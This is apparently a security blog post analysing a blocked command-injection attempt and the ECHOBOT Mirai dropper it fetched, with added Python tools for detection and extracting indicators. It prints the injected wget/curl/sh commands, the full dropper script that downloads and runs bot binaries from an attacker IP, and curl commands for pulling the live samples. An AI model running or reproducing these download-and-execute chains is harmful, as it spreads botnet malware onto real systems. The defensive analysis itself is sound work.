We intercepted a command injection attempt that came in via a website we monitor. Note: I've removed client-specific data from this, and I'm using generalized URL information to demonstrate what the command was supposed to do. We found the script he was using to try to exploit the server; he was a script kiddie from Russia. (The host was not vulnerable! Keep your sh*t updated!!! Otherwise this would've been a cleanup day, not a post!)
WARNING: EVERYTHING AFTER THIS IS HIGHLY MALICIOUS!!!
www.example.com/location/to/script.extension?wget%20hxxp://145.249(dot)106.241/richard;curl%20-O%20hxxp://145.249(dot)106.241/richard;chmod%20+x richard;sh richard;
This translates to the following:
# The vulnerable website executes these commands server side, with the web application's privileges.
wget hxxp://145.249(dot)106.241/richard; # first download attempt
curl -O hxxp://145.249(dot)106.241/richard; # second download attempt; -O keeps the remote filename, so both land as "richard"
chmod +x richard; # make richard executable (redundant, since it is run through sh anyway)
sh richard # run the dropper script "richard"
Embedded hosts often lack one of wget or curl, or one of them is blocked, so the attacker runs both. Both write the download to a file named richard in the current directory, so the worst that happens is one overwrites the other.
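The decoding above is mechanical, so it can be automated and turned into a detection. The following is an added example (not the post's own tooling): it URL-decodes a request's query string, splits it where a shell would, and flags the fetch-then-execute pattern. The access-log lines are constructed; the malicious one mirrors the generalized request from the post with the attacker's address left defanged as the write-up shows it.

```python
"""Decode a command-injection query string and flag download-and-execute chains.

Added example (not part of the original post). The access-log lines below are
constructed; the malicious one mirrors the generalized request in the post with
the attacker's address left defanged exactly as the write-up shows it.
"""
import re
from urllib.parse import unquote, urlsplit

# Downloaders whose last argument is the URL and whose output file is the
# URL's last path component (wget, curl -O). tftp has a different argv shape
# and is deliberately not handled here.
DOWNLOADERS = {"wget", "curl"}
RUNNERS = {"sh", "bash", "chmod"}

# Common Log Format: client, ident, user, [time], "METHOD target HTTP/x"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Constructed sample log: two benign requests and the injection attempt.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2019:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2019:13:55:37 +0000] "GET /search?q=wget%20manual HTTP/1.1" 200 2048
198.51.100.23 - - [10/Oct/2019:13:56:01 +0000] "GET /location/to/script.extension?wget%20hxxp://145.249(dot)106.241/richard;curl%20-O%20hxxp://145.249(dot)106.241/richard;chmod%20+x%20richard;sh%20richard; HTTP/1.1" 403 0
"""


def shell_commands_from_query(query: str) -> list[str]:
    """URL-decode the query and split it where a shell would: at each ';'.

    unquote() (not unquote_plus) is used on purpose: the '+' in 'chmod +x'
    is a literal plus here, not an encoded space. Quoting and '&&'/'|'
    are ignored, which is enough for the unquoted payload in the post.
    """
    decoded = unquote(query)
    return [c.strip() for c in decoded.split(";") if c.strip()]


def is_download_and_execute(commands: list[str]) -> bool:
    """True when a fetched file is later chmod'ed or run: the dropper pattern.

    Handles both a raw query passed to a shell ('wget ...') and a parameter
    injection ('cmd=wget ...') by stripping a leading 'name=' from the first
    token. Order matters: a fetch must precede the execution.
    """
    fetched: set[str] = set()
    for cmd in commands:
        argv = cmd.split()
        if not argv:
            continue
        tool = argv[0].split("=", 1)[-1]
        if tool in DOWNLOADERS:
            # The file that lands on disk is the URL's last path component.
            fetched.add(argv[-1].rstrip("/").rsplit("/", 1)[-1])
        elif tool in RUNNERS or tool.startswith("./"):
            name = tool[2:] if tool.startswith("./") else argv[-1]
            if name in fetched:
                return True
    return False


def scan_access_log(text: str) -> list[dict]:
    """Return one hit per request whose query decodes to a dropper chain."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, target = m.groups()
        cmds = shell_commands_from_query(urlsplit(target).query)
        if is_download_and_execute(cmds):
            hits.append({"src": src, "commands": cmds})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["src"])
        for cmd in hit["commands"]:
            print("   ", cmd)
```

The benign "wget manual" search is not flagged because nothing it fetches is later executed; the injection is, because chmod and sh both name the file that wget and curl just wrote. A real deployment would also want the request body for POST and a denylist of downloader names per platform, but the decode-split-correlate shape stays the same.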
I pulled that file from their server and found this.
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm; chmod +x ECHOBOT.arm; ./ECHOBOT.arm; rm -rf ECHOBOT.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm4; chmod +x ECHOBOT.arm4; ./ECHOBOT.arm4; rm -rf ECHOBOT.arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm5; chmod +x ECHOBOT.arm5; ./ECHOBOT.arm5; rm -rf ECHOBOT.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm6; chmod +x ECHOBOT.arm6; ./ECHOBOT.arm6; rm -rf ECHOBOT.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm7; chmod +x ECHOBOT.arm7; ./ECHOBOT.arm7; rm -rf ECHOBOT.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.i686; chmod +x ECHOBOT.i686; ./ECHOBOT.i686; rm -rf ECHOBOT.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.m68k; chmod +x ECHOBOT.m68k; ./ECHOBOT.m68k; rm -rf ECHOBOT.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.mips; chmod +x ECHOBOT.mips; ./ECHOBOT.mips; rm -rf ECHOBOT.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241ECHOBOT.mpsl; chmod +x ECHOBOT.mpsl; ./ECHOBOT.mpsl; rm -rf ECHOBOT.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.ppc; chmod +x ECHOBOT.ppc; ./ECHOBOT.ppc; rm -rf ECHOBOT.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.sh4; chmod +x ECHOBOT.sh4; ./ECHOBOT.sh4; rm -rf ECHOBOT.sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.spc; chmod +x ECHOBOT.spc; ./ECHOBOT.spc; rm -rf ECHOBOT.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.x86; chmod +x ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86
The explanation of these commands is as follows.
Each line starts with a fallback chain: if cd /tmp fails, try /var/run, then /mnt, then /root, then /. The || stops at the first cd that succeeds, and because the chain ends with ; rather than &&, the wget runs wherever the shell ended up. Each line then fetches one build of the bot, makes it executable, runs it, and deletes the file from disk (the running process survives the rm). The attacker does not know the victim's CPU, so the script tries every architecture in turn; builds for the wrong architecture fail to execute, and the one that matches runs and reports back to his listener. If you were studious, you may have noticed a typo in this guy's script: the mpsl line is missing the slash between the address and the filename, so that fetch fails outright.
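For incident response the dropper is mainly a bag of indicators: the download host, the working directories it falls back through, the architectures it sprays, and which stages are broken. The following is an added example (not the post's tooling) that parses the script into that form. DROPPER is a defanged copy of the script as printed above, including the broken mpsl line; nothing here fetches or runs anything.

```python
"""Extract indicators from the ECHOBOT dropper shown above.

Added example, not the post's own tooling. DROPPER is a defanged copy of the
script as printed in the post (the broken mpsl line included); nothing here
fetches or runs anything.
"""

DROPPER = """\
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm; chmod +x ECHOBOT.arm; ./ECHOBOT.arm; rm -rf ECHOBOT.arm
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm4; chmod +x ECHOBOT.arm4; ./ECHOBOT.arm4; rm -rf ECHOBOT.arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm5; chmod +x ECHOBOT.arm5; ./ECHOBOT.arm5; rm -rf ECHOBOT.arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm6; chmod +x ECHOBOT.arm6; ./ECHOBOT.arm6; rm -rf ECHOBOT.arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.arm7; chmod +x ECHOBOT.arm7; ./ECHOBOT.arm7; rm -rf ECHOBOT.arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.i686; chmod +x ECHOBOT.i686; ./ECHOBOT.i686; rm -rf ECHOBOT.i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.m68k; chmod +x ECHOBOT.m68k; ./ECHOBOT.m68k; rm -rf ECHOBOT.m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.mips; chmod +x ECHOBOT.mips; ./ECHOBOT.mips; rm -rf ECHOBOT.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241ECHOBOT.mpsl; chmod +x ECHOBOT.mpsl; ./ECHOBOT.mpsl; rm -rf ECHOBOT.mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.ppc; chmod +x ECHOBOT.ppc; ./ECHOBOT.ppc; rm -rf ECHOBOT.ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.sh4; chmod +x ECHOBOT.sh4; ./ECHOBOT.sh4; rm -rf ECHOBOT.sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.spc; chmod +x ECHOBOT.spc; ./ECHOBOT.spc; rm -rf ECHOBOT.spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://145.249(dot)106.241/ECHOBOT.x86; chmod +x ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86
"""


def parse_dropper(script: str) -> list[dict]:
    """One record per dropper line: fallback dirs, fetch URL, binary, arch.

    Each line is `cd A || cd B || ...; wget URL; chmod +x F; ./F; rm -rf F`.
    The `||` chain stops at the first cd that succeeds; the `;` after it
    means the fetch runs regardless of whether any cd succeeded.
    """
    stages = []
    for line in script.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        stage = {"workdirs": [], "url": None, "host": None, "binary": None,
                 "arch": None, "malformed_url": False, "self_deletes": False}
        for cmd in (c.strip() for c in line.split(";") if c.strip()):
            argv = cmd.split()
            if argv[0] == "cd":
                stage["workdirs"] = [alt.split()[1] for alt in cmd.split("||")]
            elif argv[0] in ("wget", "curl"):
                url = argv[-1]
                rest = url.split("://", 1)[-1]
                stage["url"] = url
                if "/" in rest:
                    stage["host"] = rest.split("/", 1)[0]
                else:
                    # No '/' between address and filename: wget would try to
                    # resolve "145.249.106.241ECHOBOT.mpsl" as a host and fail.
                    stage["host"], stage["malformed_url"] = rest, True
            elif argv[0].startswith("./"):
                stage["binary"] = argv[0][2:]
                stage["arch"] = stage["binary"].rsplit(".", 1)[-1]
            elif argv[0] == "rm":
                stage["self_deletes"] = True
        stages.append(stage)
    return stages


def summarize(stages: list[dict]) -> dict:
    """Blocklist-ready view: download hosts, architectures sprayed, broken stages."""
    return {
        "hosts": sorted({s["host"] for s in stages if not s["malformed_url"]}),
        "archs": [s["arch"] for s in stages],
        "broken": [s["binary"] for s in stages if s["malformed_url"]],
        "workdirs": stages[0]["workdirs"] if stages else [],
        "all_self_delete": all(s["self_deletes"] for s in stages),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_dropper(DROPPER)).items():
        print(f"{key}: {value}")
```

The summary gives you the single host to block, the five directories to sweep for leftover files on a compromised box (the rm only runs if the binary returns; a hung stage leaves its file behind), the list of architectures to expect a sample for, and the one stage the attacker broke himself.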
These are plain wget fetches, so the samples can be pulled for analysis the same way. Do this from an isolated analysis host, and do not execute what you download. (The attacker's mpsl line is missing the slash before the filename, so his own fetch of that build would fail; it is corrected here.)
curl -O hxxp://145.249(dot)106.241/ECHOBOT.arm
curl -O hxxp://145.249(dot)106.241/ECHOBOT.arm4
curl -O hxxp://145.249(dot)106.241/ECHOBOT.arm5
curl -O hxxp://145.249(dot)106.241/ECHOBOT.arm6
curl -O hxxp://145.249(dot)106.241/ECHOBOT.arm7
curl -O hxxp://145.249(dot)106.241/ECHOBOT.i686
curl -O hxxp://145.249(dot)106.241/ECHOBOT.m68k
curl -O hxxp://145.249(dot)106.241/ECHOBOT.mips
curl -O hxxp://145.249(dot)106.241/ECHOBOT.mpsl
curl -O hxxp://145.249(dot)106.241/ECHOBOT.ppc
curl -O hxxp://145.249(dot)106.241/ECHOBOT.sh4
curl -O hxxp://145.249(dot)106.241/ECHOBOT.spc
curl -O hxxp://145.249(dot)106.241/ECHOBOT.x86
What do these files reveal? None other than Mirai, the IoT botnet; the ECHOBOT naming marks one of its many variants, built for every architecture the dropper sprays.
Good attempt, but it failed miserably. To date, my company had never been able to grab a live sample of Mirai. Today I managed to grab it as it happened! Cheers to the IPS/IDS product that successfully detected and blocked the exploit attempt!
As of writing this post, those links are still live! You have been warned!